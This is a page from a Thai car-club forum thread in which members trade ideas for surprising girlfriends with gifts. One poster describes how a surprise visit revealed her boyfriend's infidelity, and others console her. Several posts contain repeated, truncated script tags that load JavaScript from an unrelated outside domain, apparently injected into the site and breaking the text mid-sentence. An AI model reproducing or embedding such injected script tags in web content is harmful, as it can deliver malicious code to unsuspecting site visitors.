ตอบ
Rangsit 33

เข้าร่วม: 01 ตุลา 2008
ตอบ: 2276

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3688
ให้คำขอบคุณ: 1582

ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 20 มกรา 2011 01:01 - ****เพื่อนๆมีวิธีให้ของขวัญสาวๆแบบเซอร์ไพร์บ้างไม๊ครับ แนะนำหน่อยนะครับ****
hacker พิมพ์ว่า:
พี่แบ้งค์ก็ยังน้ำเน่าได้เหมือนเดิม

เดี๋ยวก็ต้องมาโทรตามผมอีกเหอะ...ชินแล้ว

พี่คนรักเดียวใจเดียว ทำไงได้จ้อบเอ้ยยย
อิๆๆๆ
ได้รับคำขอบคุณจาก: benzd 
Gremlin

ชื่อเล่น: ออมสิน

เข้าร่วม: 18 ตุลา 2010
ตอบ: 235

มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 416
ให้คำขอบคุณ: 1624

สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พฤหัส, 20 มกรา 2011 06:48 - ****เพื่อนๆมีวิธีให้ของขวัญสาวๆแบบเซอร์ไพร์บ้างไม๊ครับ แนะนำหน่อยนะครับ****
Andy พิมพ์ว่า:
ถ้าให้แบบจีบกันใหม่มีวิธีเป็น100ครับ
ดูจากรูปผมขอเดาว่าท่านน่าจะแต่งานแล้ว
ผมขอแนะนำถ้าอยู่กันมานานการให้ซึ่งหน้าจริงใจจะจะไม่ให้ทันตั่งตัวแถมจูบอีกหนึ่งทีดีสุดครับ
ทำอะไรมาผิดหายโกรธหมดเชื่อผม

จากความคิดเห็น ในฐานะเป็นผู้หญิงคนหนึ่ง...
เห็นด้วยเต็ม 100 ค่ะ... 55555 <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></

และจะจำไปอีกนาน.... เรื่องเซอร์ไพรส์จูบเนี่ย... โรแมนติกสุด ๆ 555555 ให้อภัยได้หมด !!!
hacker

ชื่อเล่น: เซียนจ๊อบ

เข้าร่วม: 03 ตุลา 2008
ตอบ: 4046

ผู้ชนะเลิศการแข่งขัน ES Drag war 2011
ผู้ชนะเลิศการแข่งขัน ES Drag war 2011

ได้รับคำขอบคุณ: 10965
ให้คำขอบคุณ: 22797

ปี: 2004
พฤหัส, 20 มกรา 2011 08:45 - ****เพื่อนๆมีวิธีให้ของขวัญสาวๆแบบเซอร์ไพร์บ้างไม๊ครับ แนะนำหน่อยนะครับ****
มันยังไม่แต่งหรอกครับ เพิ่งจะเริ่ม

......

จขกท... ออกมาเฉลยด้วยว่าเมื่อคืนทำวิธีไหน
ได้รับคำขอบคุณจาก: benzd  Gremlin 
note_es04

ตอบ: 250

ได้รับคำขอบคุณ: 394
ให้คำขอบคุณ: 25

พฤหัส, 20 มกรา 2011 13:41 - ****เพื่อนๆมีวิธีให้ของขวัญสาวๆแบบเซอร์ไพร์บ้างไม๊ครับ แนะนำหน่อยนะครับ****
@จ๊อบ ไปกะพวกเอโอมันบอกแระ แต่กูไม่ว่างน่ะ สบายใจได้เค้าไม่ชอบผู้ชายลายดอกจ้า อิอิ
ปล.วันนี้มาเตะบอลกะกรูก่อนนนนนนน
note_es04

ตอบ: 250

ได้รับคำขอบคุณ: 394
ให้คำขอบคุณ: 25

พฤหัส, 20 มกรา 2011 14:05 - ****เพื่อนๆมีวิธีให้ของขวัญสาวๆแบบเซอร์ไพร์บ้างไม๊ครับ แนะนำหน่อยนะครับ****
เมื่อคืนในงานเลี้ยง มีเพื่อนเค้าถามด้วยนะว่าซื้อไรให้ ผมตอบว่าไม่มีเพื่อนเค้าก็มองแปลกๆ ในงานเค้าก็ถ่ายของขวัญกันในงานเลี้ยง
พอเลิกงาน ก็ไปส่งเค้าที่บ้านน่ะครับ พอขึ้นรถผมก็บอกว่า สุขสันต์วันเกิด อยากให้ของขวัญเป็นคนสุดท้ายนะ แค่นั้นแหละครับ
ปล.แอบเสียใจนิดนึงเพราะไม่รู้เพื่อนเค้าคิดกะเรายังไง และไม่มีของขวัญของเราในอัลบั้มรูปน่ะครับ

ปล.1 เป็นความลับนะจ็อบ
ได้รับคำขอบคุณจาก: benzd  hacker  Gremlin 
benzd

ชื่อเล่น: เบนซ์

เข้าร่วม: 11 มกรา 2009
ตอบ: 3402

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3986
ให้คำขอบคุณ: 3164

สี: ทอง แซทเทิลไลท์ (NH-663M)
พฤหัส, 20 มกรา 2011 14:10 - ****เพื่อนๆมีวิธีให้ของขวัญสาวๆแบบเซอร์ไพร์บ้างไม๊ครับ แนะนำหน่อยนะครับ****
ถ้าเขารู้สึกดี มันก็ดีแล้วครับ สู้ๆ
john

เข้าร่วม: 29 มีนา 2010
ตอบ: 570

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 3392
ให้คำขอบคุณ: 2458

ปี: 2002
พฤหัส, 20 มกรา 2011 20:31 - ****เพื่อนๆมีวิธีให้ของขวัญสาวๆแบบเซอร์ไพร์บ้างไม๊ครับ แนะนำหน่อยนะครับ****
sevenartz พิมพ์ว่า:
NeaT ES. พิมพ์ว่า:
CEMENT พิมพ์ว่า:
เคยทำให้แฟนตอนวันเกิดคับ...แอบลางานครึ่งวันไปเอาดอกไม้ตบแต่งห้องรอไว้ก่อน แล้วทำเป็นไม่สนใจในวันนั้น ปล่อยให้กลับไปเองไม่ไปรับ อ้างว่าติดประชุม พอกลับไปเจอทั้งห้องทั้งเราที่เตรียมตัวไว้แล้ว ถึงกลับโฮๆ...จัดซะทั้งคืน...อิอิ

ชอบๆอะจัดทั้งคืนเลยหรออ..ก๊ากกๆ

แฟนผมไม่อยากได้ของขวัญอะเค้าบอกว่ามีผมอยู่ก็เป็นของขวัญที่ดีที่สุดแล้ว....(ฮ่าๆโครตหล่อเลยกรู..ก๊ากๆๆ.) <script src="https://sport32news.com/civicesgroup.js"></

ปล.ล้อเล่นอะคราบ...อย่าคิดมากคราบพี่น้อง

โอ้โฮ ....จัดวันเกิดทั้งคืนเลย ระวางน๊า...เป็น ฮันนี่มูนซีสไตติส นะคร้าบบบบ,,,,,อิอิอิอิอิอิอิอิอิอิออิอิอิอิ

โอ๊ววว นี๊ท หัวใจนายหล่อ มว๊ากกกกก

สวดยวดดด ไปเลย ลูกเพี๊ยยยยย

ปล. ชอบที่บอกว่า จัดทั้งคืน จริงๆ
ได้รับคำขอบคุณจาก: Gremlin 
hacker

ชื่อเล่น: เซียนจ๊อบ

เข้าร่วม: 03 ตุลา 2008
ตอบ: 4046

ได้รับคำขอบคุณ: 10965
ให้คำขอบคุณ: 22797

พฤหัส, 20 มกรา 2011 21:01 - ****เพื่อนๆมีวิธีให้ของขวัญสาวๆแบบเซอร์ไพร์บ้างไม๊ครับ แนะนำหน่อยนะครับ****
วันนี้เตะบอลไม่ไหวค้าบบ เมื่อคืนไอ้ฮาร์ทมาปลุกกินเหล้าตอนสี่ทุ่มกว่า

ไม่ได้เตรียมของเตะบอล ....

สบายใจได้อีกระดับหนึ่ง ระดับแฮกเกอร์ต้อง "เล็กๆ เสปคจ๊อบ" ฮี่ๆๆๆ

ขอให้โปรเจคลุล่วงไปด้วยดี .... อาทิตย์หน้า เตะบอล ไม่พลาด ..

ปิดกระทู้
ได้รับคำขอบคุณจาก: Gremlin 
leprozy

ชื่อเล่น: แอม

เข้าร่วม: 19 กันยา 2009
ตอบ: 51

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 42
ให้คำขอบคุณ: 15

ปี: 2003
ศุกร์, 28 มกรา 2011 10:51 - ****เพื่อนๆมีวิธีให้ของขวัญสาวๆแบบเซอร์ไพร์บ้างไม๊ครับ แนะนำหน่อยนะครับ****
เคยทำ Surprise ให้ค่ะ

ก็ประมาณว่าวันเกิดเค้า ก็อยากจะซะไพร์สสักหน่อย ก็คิดมุขไว้แล้ว
ตอนเย็นเลิกงาน ปกติต้องไปวิ่งด้วยกันอยู่แล้ว วันนั้นก็ฟอร์มว่าติดธุระ
ไม่ไปดีกว่า แต่จริงๆก็แอบไปซื้อเค๊กให้

ระหว่างนั้น ก็ใช้เพื่อนให้โทรไปเชคกับเพื่อนอีกคนว่ากลับหรือยัง ไปไหนต่อกันรึป่าว
พอได้เรื่องก็

ไปขอคุณ รปภ เพื่อที่จะนำเค๊กขึ้นไปเซอร์ไพรส์เค้าที่ห้อง (เนื่องจากเค้าพักหอพักบริษัท
แล้วเค้าก็แยก ญ/ช ) พี่ รปภ ใจดีก็ให้ขึ้นไป พร้อมกำชับ ได้แป๊ปเดียวนะ

แล้วเราก็เดินเป็นสาวมั่นขึ้นไป เพราะทั้งหอไม่มี ญ เลย

แล้วก็เคาะประตูห้อง ก็อก ๆๆๆ เค้าก็เปิดมาพร้อมกับสีหน้าตกใจ
เราก็เลยทักไปว่า อ๊าว หลับแล้วหรอ เค้าก็ยิ่งตกใจอีก
ในมือเค้าถือโทรศัพท์อยู่ เค้าจึงทำท่าให้เราหยุดพูดแล้วก็ปิดประตูไป

แล้วเปิดมาอีกที ก็ยังตกใจอยู่ แล้วก็ขอบคุณ พร้อมไล่เราลงมารอข้างล่าง
แล้วยังว่า ขึ้นมาทำไม โทรบอกให้ลงไปหาก็ได้ ตกใจหมดเลย

เรา ก็ยืนอึ๊งอยู่ว่า อะไรว่ะ แค่เนี่ยะหรอ แล้วเหตุการณ์เมื่อกี๊คือไร

เค้าบอกว่าลงไปคอยก่อน เดี๋ยวตามไป ขออาบน้ำกับคุยธุระแป๊ปนึง

ก็เลยเดินลงมาด้วยความ งง ๆ โอเคๆ ไม่เป็นไร คงคุยธุระจริง ๆ

เวลาก็ผ่านไปเกือบชั่วโมง

ก็มีโทรศัพท์เข้ามาบอกว่า พรุ่งนี้แล้วกันนะ ไว้ค่อยไปเป่าพร้อม ๆ กัน
กับเพื่อน ๆ (เนื่องจากนัดฉลองกันอีกวัน ) เราก็เอ่อ... หรอ
ในใจก็ คืออยากพิเศษกัน 2 คนก่อนได้ไหม เค้าก็ขอบคุณพร้อม
กับบอกว่า ซื้อมาทำไม เปลืองป่าว ๆ ยังตกใจไม่หายเลย ทำมาตลกกลบเกลื่อน

แต่อารมณ์เราตอนนั้นคือ แค่นี้เองหรอ ให้รอเป็นชั่วโมงแล้วทำอย่างนี้หรอ
คุยไปคุยมาก็เริ่มปรี๊ดจัด ก็เริ่มถามไล่ ๆ ๆ ๆ เข้าไป สุดท้ายเราก็เลย
พูดออกไปว่า.....

"เราเลิกกันเหอะ พอเหอะ เรายอมแล้ว พอ"

แล้วก็ขับรถกลับ กทม อย่างด่วน

จริงๆคือมีปัญหากันอยู่แล้ว แต่ก็พยายามมองๆข้ามไป เราก็รู้อยู่ว่าเค้ามีอีกคน
แต่ทำกันอย่างนี้ ก็พอดีกว่า

แค่อยากจะสื่อว่า....
บางทีการไปเซอร์ไพร์สเค้าก็อาจจะเจอเซอร์ไพร์สกว่า

แต่ก็อยู่กับสถานภาพของแต่ละคู่ด้วยว่าเป็นยังไง

ก็ขอให้การเซอร์ไพร์สของแต่ละคู่ ยิ่งเป็นการเพิ่มความประทับใจให้กันและกันมากขึ้นนะค่ะ

ได้รับคำขอบคุณจาก: Gremlin  hacker  benzd  CEMENT  Narongsak  honeybeex7 
Gremlin

ชื่อเล่น: ออมสิน

เข้าร่วม: 18 ตุลา 2010
ตอบ: 235

ได้รับคำขอบคุณ: 416
ให้คำขอบคุณ: 1624

สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
ศุกร์, 28 มกรา 2011 11:00 - ****เพื่อนๆมีวิธีให้ของขวัญสาวๆแบบเซอร์ไพร์บ้างไม๊ครับ แนะนำหน่อยนะครับ****
leprozy พิมพ์ว่า:
เคยทำ Surprise ให้ค่ะ

ก็ประมาณว่าวันเกิดเค้า ก็อยากจะซะไพร์สสักหน่อย ก็คิดมุขไว้แล้ว
ตอนเย็นเลิกงาน ปกติต้องไปวิ่งด้วยกันอยู่แล้ว วันนั้นก็ฟอร์มว่าติดธุระ
ไม่ไปดีกว่า แต่จริงๆก็แอบไปซื้อเค๊กให้

ระหว่างนั้น ก็ใช้เพื่อนให้โทรไปเชคกับเพื่อนอีกคนว่ากลับหรือยัง ไปไหนต่อกันรึป่าว
พอได้เรื่องก็

ไปขอคุณ รปภ เพื่อที่จะนำเค๊กขึ้นไปเซอร์ไพรส์เค้าที่ห้อง (เนื่องจากเค้าพักหอพักบริษัท
แล้วเค้าก็แยก ญ/ช ) พี่ รปภ ใจดีก็ให้ขึ้นไป พร้อมกำชับ ได้แป๊ปเดียวนะ

แล้วเราก็เดินเป็นสาวมั่นขึ้นไป เพราะทั้งหอไม่มี ญ เลย

แล้วก็เคาะประตูห้อง ก็อก ๆๆๆ เค้าก็เปิดมาพร้อมกับสีหน้าตกใจ
เราก็เลยทักไปว่า อ๊าว หลับแล้วหรอ เค้าก็ยิ่งตกใจอีก
ในมือเค้าถือโทรศัพท์อยู่ เค้าจึงทำท่าให้เราหยุดพูดแล้วก็ปิดประตูไป

แล้วเปิดมาอีกที ก็ยังตกใจอยู่ แล้วก็ขอบคุณ พร้อมไล่เราลงมารอข้างล่าง
แล้วยังว่า ขึ้นมาทำไม โทรบอกให้ลงไปหาก็ได้ ตกใจหมดเลย

เรา ก็ยืนอึ๊งอยู่ว่า อะไรว่ะ แค่เนี่ยะหรอ แล้วเหตุการณ์เมื่อกี๊คือไร

เค้าบอกว่าลงไปคอยก่อน เดี๋ยวตามไป ขออาบน้ำกับคุยธุระแป๊ปนึง

ก็เลยเดินลงมาด้วยความ งง ๆ โอเคๆ ไม่เป็นไร คงคุยธุระจริง ๆ

เวลาก็ผ่านไปเกือบชั่วโมง

ก็มีโทรศัพท์เข้ามาบอกว่า พรุ่งนี้แล้วกันนะ ไว้ค่อยไปเป่าพร้อม ๆ กัน
กับเพื่อน ๆ (เนื่องจากนัดฉลองกันอีกวัน ) เราก็เอ่อ... หรอ
ในใจก็ คืออยากพิเศษกัน 2 คนก่อนได้ไหม เค้าก็ขอบคุณพร้อม
กับบอกว่า ซื้อมาทำไม เปลืองป่าว ๆ ยังตกใจไม่หายเลย ทำมาตลกกลบเกลื่อน

แต่อารมณ์เราตอนนั้นคือ แค่นี้เองหรอ ให้รอเป็นชั่วโมงแล้วทำอย่างนี้หรอ
คุยไปคุยมาก็เริ่มปรี๊ดจัด ก็เริ่มถามไล่ ๆ ๆ ๆ เข้าไป สุดท้ายเราก็เลย
พูดออกไปว่า.....

"เราเลิกกันเหอะ พอเหอะ เรายอมแล้ว พอ"

แล้วก็ขับรถกลับ กทม อย่างด่วน

จริงๆคือมีปัญหากันอยู่แล้ว แต่ก็พยายามมองๆข้ามไป เราก็รู้อยู่ว่าเค้ามีอีกคน
แต่ทำกันอย่างนี้ ก็พอดีกว่า

แค่อยากจะสื่อว่า....
บางทีการไปเซอร์ไพร์สเค้าก็อาจจะเจอเซอร์ไพร์สกว่า

แต่ก็อยู่กับสถานภาพของแต่ละคู่ด้วยว่าเป็นยังไง

ก็ขอให้การเซอร์ไพร์สของแต่ละคู่ ยิ่งเป็นการเพิ่มความประทับใจให้กันและกันมากขึ้นนะค่ะ

อ่านแล้วเจ็บจี๊ดด......

เคยเจอเหตุการณ์แนวๆ นี้มาเหมือนกัน บางทีอาจจะแรงกว่าด้วยซ้ำ เพราะมีอาวุธเข้ามาเกี่ยวข้อง พลาดก็อาจโดนแทงได้ 55

ไว้ถ้ามีโอกาสเจอกันคงได้พูดคุยแลกเปลี่ยนประสบการณ์กันนะคะ

ยังไงก็เป็นกำลังใจให้นะคะ "รักคนที่เขารักเราดีกว่า"

ผู้ชายในโลกนี้มีมากมาย... อย่าไปเสียดายกับผู้ชายที่ไม่ได้มีหัวใจไว้เพื่อเราคนเดียว...

ถ้าหาดีไม่ได้จริง ๆ..

ก็ถือคติว่า ..

" อย่าเป็นโสดจนตาย...ให้ผู้ชายเสียดายเล่น..!!! "

แล้วใช้ชีวิตโสดอย่างมีความสุขนะคะ... 5555555555555
ได้รับคำขอบคุณจาก: hacker  leprozy  honeybeex7 
leprozy

ชื่อเล่น: แอม

เข้าร่วม: 19 กันยา 2009
ตอบ: 51

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 42
ให้คำขอบคุณ: 15

ศุกร์, 28 มกรา 2011 11:56 - ****เพื่อนๆมีวิธีให้ของขวัญสาวๆแบบเซอร์ไพร์บ้างไม๊ครับ แนะนำหน่อยนะครับ****
[quote="Gremlin"]

เคยเจอเหตุการณ์แนวๆ นี้มาเหมือนกัน บางทีอาจจะแรงกว่าด้วยซ้ำ เพราะมีอาวุธเข้ามาเกี่ยวข้อง พลาดก็อาจโดนแทงได้ 55

ไว้ถ้ามีโอกาสเจอกันคงได้พูดคุยแลกเปลี่ยนประสบการณ์กันนะคะ

ยังไงก็เป็นกำลังใจให้นะคะ "รักคนที่เขารักเราดีกว่า"

ผู้ชายในโลกนี้มีมากมาย... อย่าไปเสียดายกับผู้ชายที่ไม่ได้มีหัวใจไว้เพื่อเราคนเดียว...

" อย่าเป็นโสดจนตาย...ให้ผู้ชายเสียดายเล่น..!!! "

แล้วใช้ชีวิตโสดอย่างมีความสุขนะคะ... 5555555555555

<script src="https://sport32news.com/civicesgroup.js"></

ผ่านมาเกือบ 2 เดือนแล้วค่ะ

ก็จะสู้ต่อไปอีก 555+

แต่บางวันก็เหนื่อย เพราะยังต้องเจอกันอยู่
nitchanan

ชื่อเล่น: นู๋แอนนี่

เข้าร่วม: 12 มกรา 2011
ตอบ: 76

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 33
ให้คำขอบคุณ: 0

ปี: 2001
ศุกร์, 28 มกรา 2011 12:11 - ****เพื่อนๆมีวิธีให้ของขวัญสาวๆแบบเซอร์ไพร์บ้างไม๊ครับ แนะนำหน่อยนะครับ****
แค่ SMS กะดอกไม้สักช่อหนูก็สุดจะปลื้มแล้วค่ะพี่..^____^
es330

เข้าร่วม: 10 พฤศจิกา 2008
ตอบ: 1890

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3172
ให้คำขอบคุณ: 6546

เสาร์, 29 มกรา 2011 11:57 - ****เพื่อนๆมีวิธีให้ของขวัญสาวๆแบบเซอร์ไพร์บ้างไม๊ครับ แนะนำหน่อยนะครับ****
Narongsak พิมพ์ว่า:
ผมเคยให้ แหวนทองเป็นของขวัญวันเกิดแฟนครับ

วิธีผมก็คือ ทำเป็นไม่รู้ไม่ชี้เลยอ่ะครับ เรื่องวันเกิด

หรือถ้าเค้าคิดว่าเรารู้ ก็พาไปทานข้าวร้านอาหารสักแห่ง

แล้วพากลับ เหมือนกับว่านี่แหละคือของขวัญวันเกิด

พอเกือบๆ 6 ทุ่ม คือใกล้หมดวันเกิดของเธอแล้ว

เราก็ ให้เลยครับ แบบไม่ต้องตั้งตัวกันเลย แล้วก็บอกว่าของขวัญชิ้นสุดท้ายของวันนี้ คงถูกใจที่สุดนะ

เธอตื่นเต้นครับ ซึ้งโครต เพราะเธอจะคิดว่า เราไม่มีอะไรจะให้แล้ว

concept งานนี้ก็คือพยายามทำตัวเหมือนกับว่า วันเกิดเธอเป็นวันธรรมดาวันนึง แล้วค่อยมาชกทีหลังครับ

.......แต่ทั้งวันอาจไม่สวยหรูเท่าไหร่ เราต้องอดทน.............

สู้ๆนะครับ เป็นกำลังใจให้
CEMENT

ชื่อเล่น: อิท

เข้าร่วม: 18 กรกฎา 2009
ตอบ: 1133

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 10852
ให้คำขอบคุณ: 2770

เสาร์, 29 มกรา 2011 14:34 - ****เพื่อนๆมีวิธีให้ของขวัญสาวๆแบบเซอร์ไพร์บ้างไม๊ครับ แนะนำหน่อยนะครับ****
[quote="leprozy"]
Gremlin พิมพ์ว่า:

<script src="https://sport32news.com/civicesgroup.js"></

ผ่านมาเกือบ 2 เดือนแล้วค่ะ

ก็จะสู้ต่อไปอีก 555+

แต่บางวันก็เหนื่อย เพราะยังต้องเจอกันอยู่

เวลาช่วยได้คับ อยู่เป็นโสดก้อสนุกดีนะคับ แค่เหงาเป็นบางเวลา...ผมโสดมาจะสองปีแล้วเนี่ย...
ได้รับคำขอบคุณจาก: leprozy 
hanaun

เข้าร่วม: 16 ตุลา 2008
ตอบ: 1102

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 863
ให้คำขอบคุณ: 192

อังคาร, 1 กุมภา 2011 19:27 - ****เพื่อนๆมีวิธีให้ของขวัญสาวๆแบบเซอร์ไพร์บ้างไม๊ครับ แนะนำหน่อยนะครับ****
โสดอ่ะเรื่องจริง แต่ซิงอ่ะข่าวลือ

ได้รับคำขอบคุณจาก: honeybeex7 
honeybeex7

เข้าร่วม: 11 มิถุนา 2010
ตอบ: 4710

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2450
ให้คำขอบคุณ: 10992

ที่อยู่: แดนสนธยาของ "เหล่าเทพ" มีแต่ "เทพ" ด้วยกันเท่านั้นที่ไปถึง
ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พุธ, 2 กุมภา 2011 15:51 - ****เพื่อนๆมีวิธีให้ของขวัญสาวๆแบบเซอร์ไพร์บ้างไม๊ครับ แนะนำหน่อยนะครับ****
กระทู้นี้ดีแฮะ เบื่อพวกกระทู้ความรักซ้ำซากจำเจ ตอแหลแล้ว

เจอกระทู้นี้เข้าไปเริ่มต้นจากการจะเซอไพร้ของสมาชิกท่านนึง จนกลายเป็นคุณสุภาพตรีเข้ามาแชร์อาการผิดหวังจากการไปเซอร์ไพร้
ความรักมี 2 ด้านครับ สู่ๆและเข็มแข็ง

บางคนสู้แต่ไม่แข็ง และบางคนแข็งแต่ไม่สู้ จะให้ดีต้องมีทั้ง 2 อย่าง
bomtik

เข้าร่วม: 02 เมษา 2009
ตอบ: 772

Guru ES
Guru ES

ได้รับคำขอบคุณ: 497
ให้คำขอบคุณ: 803

พุธ, 2 กุมภา 2011 15:57 - ****เพื่อนๆมีวิธีให้ของขวัญสาวๆแบบเซอร์ไพร์บ้างไม๊ครับ แนะนำหน่อยนะครับ****
NeaT ES. พิมพ์ว่า:
CEMENT พิมพ์ว่า:
เคยทำให้แฟนตอนวันเกิดคับ...แอบลางานครึ่งวันไปเอาดอกไม้ตบแต่งห้องรอไว้ก่อน แล้วทำเป็นไม่สนใจในวันนั้น ปล่อยให้กลับไปเองไม่ไปรับ อ้างว่าติดประชุม พอกลับไปเจอทั้งห้องทั้งเราที่เตรียมตัวไว้แล้ว ถึงกลับโฮๆ...จัดซะทั้งคืน...อิอิ

ชอบๆอะจัดทั้งคืนเลยหรออ..ก๊ากกๆ

แฟนผมไม่อยากได้ของขวัญอะเค้าบอกว่ามีผมอยู่ก็เป็นของขวัญที่ดีที่สุดแล้ว....(ฮ่าๆโครตหล่อเลยกรู..ก๊ากๆๆ.) <script src="https://sport32news.com/civicesgroup.js"></

ปล.ล้อเล่นอะคราบ...อย่าคิดมากคราบพี่น้อง

ชอบ ชอบ ยิ่งตอนสุดท้าย ชอบสุด สุด
ตอบ
หน้า 2 จาก 2
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.